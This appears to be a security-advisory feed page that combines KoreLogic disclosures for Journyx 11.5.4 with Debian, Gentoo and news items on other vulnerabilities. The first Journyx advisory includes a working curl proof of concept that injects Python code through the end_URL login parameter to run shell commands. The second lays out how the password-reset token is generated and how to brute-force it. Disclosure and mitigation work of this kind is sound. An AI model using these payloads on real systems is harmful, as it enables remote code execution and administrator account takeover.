Journyx version 11.5.4 has an issue where attackers with a valid username and password can exploit a python code injection vulnerability during the natural login flow.

KL-001-2024-008: Journyx Authenticated Remote Code Execution

Title: Journyx Authenticated Remote Code Execution  
Advisory ID: KL-001-2024-008  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-008.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-94: Improper Control of Generation of Code  
                          ('Code Injection'), CWE-95: Improper Neutralization  
                          of Directives in Dynamically Evaluated Code  
                          ('Eval Injection')  
      CVE ID: CVE-2024-6891

2. Vulnerability Description

      Attackers with a valid username and password can exploit  
      a python code injection vulnerability during the natural  
      login flow.

3. Technical Description

      When utilizing a username and password to authenticate to  
      Journyx via the web interface, an HTTP request is sent to  
      "wtlogin.pyc" containing the credentials. Upon a successful  
      login, the user is redirected to "wte.pyc" or the URL specified  
      in the "end_URL" body parameter if one is supplied.

      An additional condition is present, however. If the  
      "end_URL" value is over 1,000 characters, the value is instead  
      interpolated into a python "import" statement which is passed  
      into the "exec()" function, thereby executing arbitrary code.

      Code snippet from "wtlogin.pyc":

      finalURL = end_URL + '.pyc?' + genlib.URLEncodeParams(params)  
      if len(finalURL) < 1000:  
          raise genlib.HTTP302Found(finalURL)  
      else:  
          exec('import %s; %s.main()' % (end_URL, end_URL))

      The "params" variable is derived from the query parameters  
      included in the login request, so the size of "finalURL"  
      is trivial to inflate.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted instances of JournyX, additional security  
      measures (such as input sanitization) can be added by monkey  
      patching the PYC file responsible for handling request  
      parameters (mycgi.pyc).

      1) Rename "mycgi.pyc" to an alternative name, e.g. mycgi_original.pyc.  
           $ mv wt_tar/pi/pylib/wtlib/mycgi.py wt_tar/pi/pylib/wtlib/mycgi_original.py

      2) Create a file named "mycgi.py" in the same directory.  
           $ touch wt_tar/pi/pylib/wtlib/mycgi.py

      3) Insert the following code into the newly created "mycgi.py"

           from mycgi_original import *  
           from html import escape

           def patch():  
               pdata = _parse()

               # force the value of "end_URL" to always be "wte"  
               if pdata.get('end_URL'): pdata['end_URL'] = ['wte']

               # sanitize user-controlled error messages  
               for parameter in ['error', 'error_description']:  
                   if not pdata.get(parameter): continue  
                   pdata[parameter] = [escape(value) for value in pdata[parameter]]

               return pdata

           _parse = parse  
           parse  = patch

      Once these changes have been made, the JournyX native "mycgi.parse()"  
      function will be overwritten with the "patch()" function located in the  
      "mycgi.py" file. Relevant to this advisory, the patch provided above  
      will force the "end_URL" parameter to always have a value of "wte".

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     By leveraging the existing "web" python module, it is possible  
     to see the output of shell commands as returned by "os.popen()".

     [attacker@box]$ HOST='redacted.com'; PORT='8080'; USERNAME='employee'; PASSWORD='password123'; COMMAND='id'; \  
                     curl -x http://localhost:8080 -X POST \  
                          -d   
"wtusername=$USERNAME&wtpassword=$PASSWORD&end_URL=os,web%0aweb.response.text%3dos.popen('$COMMAND').read()#&timestamp=9999999999&pageid=$RANDOM"   
\  
                          -H 'Cookie: wtsession=foobar' \  
"http://$HOST:$PORT/jtcgi/wtlogin.pyc?z=$(printf 'Z%.0s' {1..1000})"

     uid=1000(foo) gid=1000(foo)   
groups=1000(foo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)  
     [attacker@box]$

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Authenticated Remote Code Execution

Debian Linux Security Advisory 5743-1 - Multiple cross-site scripting vulnerabilities were discovered in RoundCube webmail.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5743-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 08, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : roundcube  
CVE ID         : CVE-2024-42008 CVE-2024-42009 CVE-2024-42010

Multiple cross-site scripting vulnerabilities were discovered in  
RoundCube webmail.

 For the stable distribution (bookworm), these problems have been fixed in  
version 1.6.5+dfsg-1+deb12u3.

We recommend that you upgrade your roundcube packages.

For the detailed security status of roundcube please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/roundcube

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma0oZkACgkQEMKTtsN8  
TjYxhA//UCLgEJvU4lRhVKupyDDsLgIxy4yWCvwDORqLtckWd83mJZXqbnUQYOUU  
bvTaAHZ5XEEQ8mNwviDwgQZoSK7hY0ZHPb3NSbuc/2hl6aVUp9BqxzQ0iZ4haxiY  
LtbqB29zpelXB0orRgH+rNISBLwAei2C+Vf213TKTmceiUGzhRxvkJKr4H++W2b6  
7OkAoYqXIIH8OvKJmMgLirW/+toGR29c9F29d+C3Oyq/Qis0e/6osDIehFAdayro  
EGJAvoUm72Vfe+syTF3csItT4vtf73qMb51CP67ATeGZ29j7bllqHgybLfjfZyI7  
a4v5/VUGe+tDxvFiSsPCpBDuin843qt3rflrcy/LFaVvrYa7/SIcwV84uxVrjf85  
mwwlIIud8n01EY7oPw0LK51a6MIrniFePAC3/KyYgBhya+hKE1T3JLQ/8XDRk/zo  
M9Mqu1MbtamhjAeTdzkckRr+9ho+meY5un1MmnPtVIMoAaNhG/AteeqAuwCtucAF  
Fg36kslrDwd+ojYUavIaE3AoRoLRzto5aAy46tXCE5JSakw2haKpBHoQfAhFwLZ/  
59xds+gu7lRWp71Qhx2xBYclJ9XGNsdyx1g8Dzt0tPTQxwHCShP3fI2Wit8QOsWu  
VeqdGxyqGT+cFrTmWRaVCKRQOsUgLjTpY2Nm5aKorBdD1HT8FU0=  
=eXCy  
-----END PGP SIGNATURE-----

Debian Security Advisory 5743-1

Journyx version 11.5.4 suffers from an issue where password reset tokens are generated using an insecure source of randomness. Attackers who know the username of the Journyx installation user can bruteforce the password reset and change the administrator password.

KL-001-2024-007: Journyx Unauthenticated Password Reset Bruteforce

Title: Journyx Unauthenticated Password Reset Bruteforce  
Advisory ID: KL-001-2024-007  
Publication Date: 2024.08.07  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-007.txt

1. Vulnerability Details

      Affected Vendor: Journyx  
      Affected Product: Journyx (jtime)  
      Affected Version: 11.5.4  
      Platform: GNU/Linux  
      CWE Classification: CWE-321: Use of Hard-coded Cryptographic Key,  
                          CWE-334: Small Space of Random Values,  
                          CWE-799: Improper Control of Interaction Frequency  
      CVE ID: CVE-2024-6890

2. Vulnerability Description

      Password reset tokens are generated using an insecure source  
      of randomness. Attackers who know the username of the Journyx  
      installation user can bruteforce the password reset and change  
      the administrator password.

3. Technical Description

     From an unauthenticated perspective, a user can initiate the  
     password reset flow by clicking the "Reset your password" button  
     on the Journyx login screen and supplying a valid username. A  
     password reset link containing a "random" token is sent to the  
     email address associated with the username.

     The password reset token is generated using the current epoch  
     and the user ID associated with the request. The user ID is  
     a 128-bit UUID for every user *except* for the user created  
     during the initial setup of the Journyx instance, i.e., the  
     system administrator account. For this single user, the user  
     ID defaults to the username. By targeting this user, the need  
     to leak a UUID is removed entirely. If the Journyx instance was  
     configured according to the official System Administration guide  
(https://journyx.com/Files/Journyx_Sysadmin_and_Recovery_v11.pdf),  
     the username is "journyx". Alternatively, the username can be  
     leaked via stacktraces.

     When generating the token, a secret key is created by inserting  
     the user ID inbetween the strings 'chuck' and 'palahniuk':

         mysessiontoken = 'chuck%spalahniuk' % me

     This key is used to XOR the string literal representation of  
     the list object "[userID, time.time()]". The output of the XOR  
     function is then base64 encoded:

         eStr = xor_str(istr, key)  
         aStr = binascii.b2a_base64(eStr).strip()

     Since the user ID is a known value, only the output of  
     "time.time()" (the epoch at the time of "encryption") is  
     unknown. However, by opening a TCP connection and noting the  
     epoch immediately after sending an HTTP request to initiate  
     the password reset flow, a pool of tokens can be generated by  
     incrementing the epoch. There is a high degree of certainty  
     the valid reset token is contained within a pool larger than  
     50,000 tokens.

     Depending upon network latency and other external factors,  
     a successful bruteforce attack using these tokens can take  
     anywhere from several minutes to over an hour.

4. Mitigation and Remediation Recommendation

      The vendor reports that this issue was remediated in Journyx  
      v12.0.0, which is the first wholly cloud-hosted version of  
      this product.

      For self-hosted versions of Journyx, one incremental  
      improvement is to disable user-initiated password reset  
      functionality in the application settings.

      1) Log into the JournyX web application as an administrator  
      2) Navigate to Configuration -> System Settings -> Security Settings  
      3) Ensure the checkbox labeled "Show a password reset button on login  
         screen" is disabled.  
      4) Click the "Save" button

      Another option would be to monkey patch the .pyc file that  
      contains these hardcoded strings, ./wtdoc.pyc, by deploying a .py  
      file that uses unique strings and then loads wtdoc_original.pyc  
      (see KL-001-2024-008 and KL-001-2024-009 for examples).

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc.

6. Disclosure Timeline

      2024.01.31 - KoreLogic notifies Journyx support of the intention to  
                   report vulnerabilities discovered in the licensed,  
                   on-premises version of the product.  
      2024.01.31 - Journyx acknowledges receipt.  
      2024.02.02 - KoreLogic requests a meeting with Journyx support to share  
                   vulnerability details.  
      2024.02.07 - KoreLogic reports vulnerability details to Journyx.  
      2024.02.09 - Journyx responds that this vulnerability has been remediated  
                   in the cloud-hosted version of the product.  
      2024.02.21 - KoreLogic offers to test the cloud version to confirm  
                   the fix; no response.  
      2024.07.01 - KoreLogic notifies Journyx of impending public disclosure.  
      2024.07.09 - Journyx confirms version number of the remediation.  
      2024.08.07 - KoreLogic public disclosure.

7. Proof of Concept

     The following script automatically exploits this issue by initiating  
     a password reset flow and bruteforces the value after generating a  
     list of 50,000 tokens.

     [attacker@box]$ python unauth2rce.py --url http://redacted.com:8080/ --username foo --command id  
     [*] Beginning Attack. Using the following timestamp: "1706708084.2051988"  
     [+] New Password Generated: 2DCD5AE1F0F34B84A1E0F1FB5768219B

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Journyx 11.5.4 Unauthenticated Password Reset Bruteforce

Debian Linux Security Advisory 5741-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5741-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonAugust 08, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7532 CVE-2024-7533 CVE-2024-7534 CVE-2024-7535                  CVE-2024-7536 CVE-2024-7550Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 127.0.6533.99-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAma0SqsACgkQZF0CR8NudjfspBAAnoPrE5KCKoP9rOTUQVYwKg7ySO7mOvgecvQJ9oFxFQ4zFfMsX5f2N10ISOfsydkFqSslkHyKuqBErZrbcOLAf98/DRs+UAqKYZhCi3aN0HF7qD4TGAXT/QaWL14ZYxGqlt6Mmw0YzQIC8naN9FyrR2cUO2lZQzLv918Rtencr4S6+XEMvwOEpSf71oypdKjlvcMb8SzAJrvpAvzF9Hk+d/KwOmtvz+lY+8F9VHevv2/S+L//D2oH0k+kEBHFS3qHn7loOlBilntKWRLogPSfW4ypqrZpaK4FPCuETc+komSZJk7tFDjEDgLjGLTBAJeLPNbGTdkR+lXWxiL6HxCEXUIr+eOCue7LxMQapENcdMJxiHfphaokHF05YEKADDd/g7i69v5PweKjGDyCNaqXvV4KdZN5CWs7ykp61TdWsO+qio9VaD4tYSqqPV80CnZGMARthPhqu8ANie12WemtuxWZdt5VlZhR2fV0oBDWZuRhFs3XPSnV+ImVXB8/Gu81OiWPRejWWT/Xbs3vVNQ50IqcbXFNTAKmAn1qAC7zfLqqELLA8/h83z7duevrk3NPiD4eDPIX77iyHFfXJkEmzHAauhGFOZrOkQ1ptIsgRT23ETK6Gj1WPfdR73HJjUUaG34dDV5PZUW84NFhB9jgz1GC/ukHyd4HYC34U4i1N8c==/7aP-----END PGP SIGNATURE-----

Debian Security Advisory 5741-1

A bug in the eBPF Verifier branch pruning logic can lead to unsafe code paths being incorrectly marked as safe. As demonstrated in the exploitation section, this can be leveraged to get arbitrary read/write in kernel memory, leading to local privilege escalation and Container escape.

Linux eBPF Path Pruning Gone Wrong

A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This is the proof of concept exploit produced by Google.

Linux xt_compat_target_from_user Heap Out-Of-Bounds Write

Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This is a proof of concept exploit produced by Google.

Linux KVM VM_IO|VM_PFNMAP VMA Mishandling

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.
The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky

Vulnerability / Browser Security

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.

The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky said.

The Israeli application security company said the implications of the vulnerability are far-reaching, and that it stems from the inconsistent implementation of security mechanisms and a lack of standardization across different browsers.

As a result, a seemingly harmless IP address such as 0.0.0.0 could be weaponized to exploit local services, resulting in unauthorized access and remote code execution by attackers outside the network. The loophole is said to have been around since 2006.

0.0.0.0 Day impacts Google Chrome/Chromium, Mozilla Firefox, and Apple Safari that enables external websites to communicate with software that runs locally on MacOS and Linux. It does not affect Windows devices as Microsoft blocks the IP address at the operating system level.

Particularly, Oligo Security found that public websites using domains ending in ".com" are able to communicate with services running on the local network and execute arbitrary code on the visitor's host by using the address 0.0.0.0 as opposed to localhost/127.0.0.1.

It's also a bypass of Private Network Access (PNA), which is designed to prohibit public websites from directly accessing endpoints located within private networks.

Any application that runs on localhost and can be reached via 0.0.0.0 is likely susceptible to remote code execution, including local Selenium Grid instances by dispatching a POST request to 0.0.0\[.\]0:4444 with a crafted payload.

In response to the findings in April 2024, web browsers are expected to block access to 0.0.0.0 completely, thereby deprecating direct access to private network endpoints from public websites.

"When services use localhost, they assume a constrained environment," Lumelsky said. "This assumption, which can (as in the case of this vulnerability) be faulty, results in insecure server implementations."

"By using 0.0.0.0 together with mode 'no-cors,' attackers can use public domains to attack services running on localhost and even gain arbitrary code execution (RCE), all using a single HTTP request."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

0.0.0.0 Day: 18-Year-Old Browser Vulnerability Impacts MacOS and Linux Devices

Gentoo Linux Security Advisory 202408-13 - A vulnerability has been discovered in Nokogiri, which can lead to a denial of service. Versions greater than or equal to 1.13.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Nokogiri: Denial of Service  
     Date: August 07, 2024  
     Bugs: #884863  
       ID: 202408-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Nokogiri, which can lead to a  
denial of service.

Background  
==========

Nokogiri is an HTML, XML, SAX, and Reader parser.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-ruby/nokogiri  < 1.13.10     >= 1.13.10

Description  
===========

A denial of service vulnerability has been discovered in Nokogiri.  
Please review the CVE identifier referenced below for details.

Impact  
======

Nokogiri fails to check the return value from `xmlTextReaderExpand` in  
the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a  
null pointer exception when invalid markup is being parsed. For  
applications using `XML::Reader` to parse untrusted inputs, this may  
potentially be a vector for a denial of service attack.

Workaround  
==========

Users may be able to search their code for calls to either  
`XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if  
they are affected.

Resolution  
==========

All Nokogiri users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/nokogiri-1.13.10"

References  
==========

[ 1 ] CVE-2022-23476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23476

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-13

Debian Linux Security Advisory 5740-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, the bypass of sandbox restrictions or an information leak.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5740-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 07, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-7519 CVE-2024-7521 CVE-2024-7522 CVE-2024-7524   
                 CVE-2024-7525 CVE-2024-7526 CVE-2024-7527 CVE-2024-7529   
                 CVE-2024-7531

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code, the bypass of sandbox restrictions or an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.14.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.14.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmazJNEACgkQEMKTtsN8  
Tjbc0A/+ND/PqMdzy6m7syWycmZMYbI+i19RSJHC75rwT3MgVB0U8WkRD1EPe7Uw  
IAYoOJ2zzE8FkgjEgQBwv7S3krhl888NgbRtyFZAX41UjyoZZ4q2T+N0h9DICPcb  
EcuaJCrvai4AsVIK2MXzBza8he1emof0tqXTFTyDpZtiui6fW7sEDL/4TPbaU/+7  
MlM7fjtPnCOBrkxGY7dpnfLX3AlFsbxcpe2cRnCQ/CoAGTJ2/grCGucgFLPHDSut  
rnTXWMzT0H1iXXdEJ688Nl6D50+nNmovzoyCTw3ZGsB/fSAUiFM0Lp0Ct31uLy5l  
uLT4hOEgM1FZGkEmf0mW4Ugwajv161o4uTLJMViai3MGNw+A5G040yAgdgn4ohQn  
Ew1o+im9qLw+pimte8OpixYzJHWw4KPouzJH7SZrlLTilrhDlC22EKE9F6jD0QF2  
9ay/pEbkF6AT4HSgguUzb/6DR21sjkM4x70P6cNYJO6Jak+IMtG4Qp35YIsdO9cn  
0W/nWz5FjtlwvQrCusQ49JM/N23TlFsB2y2+NfCADZb6Q4OkGhRLB9mtdZQUXWOT  
JgsYj9/+pNNkkHQcllPGgSXbtddyxE0OMehN2eWrN/kjcIS6XwxI0j+8eZbY5fcM  
yVdgH2foNnvtPnKCTT3qdq2poLCkvVFNrAyMKCXwkOxTZ1FY5fg=  
=i/4D  
-----END PGP SIGNATURE-----

Tag

#linux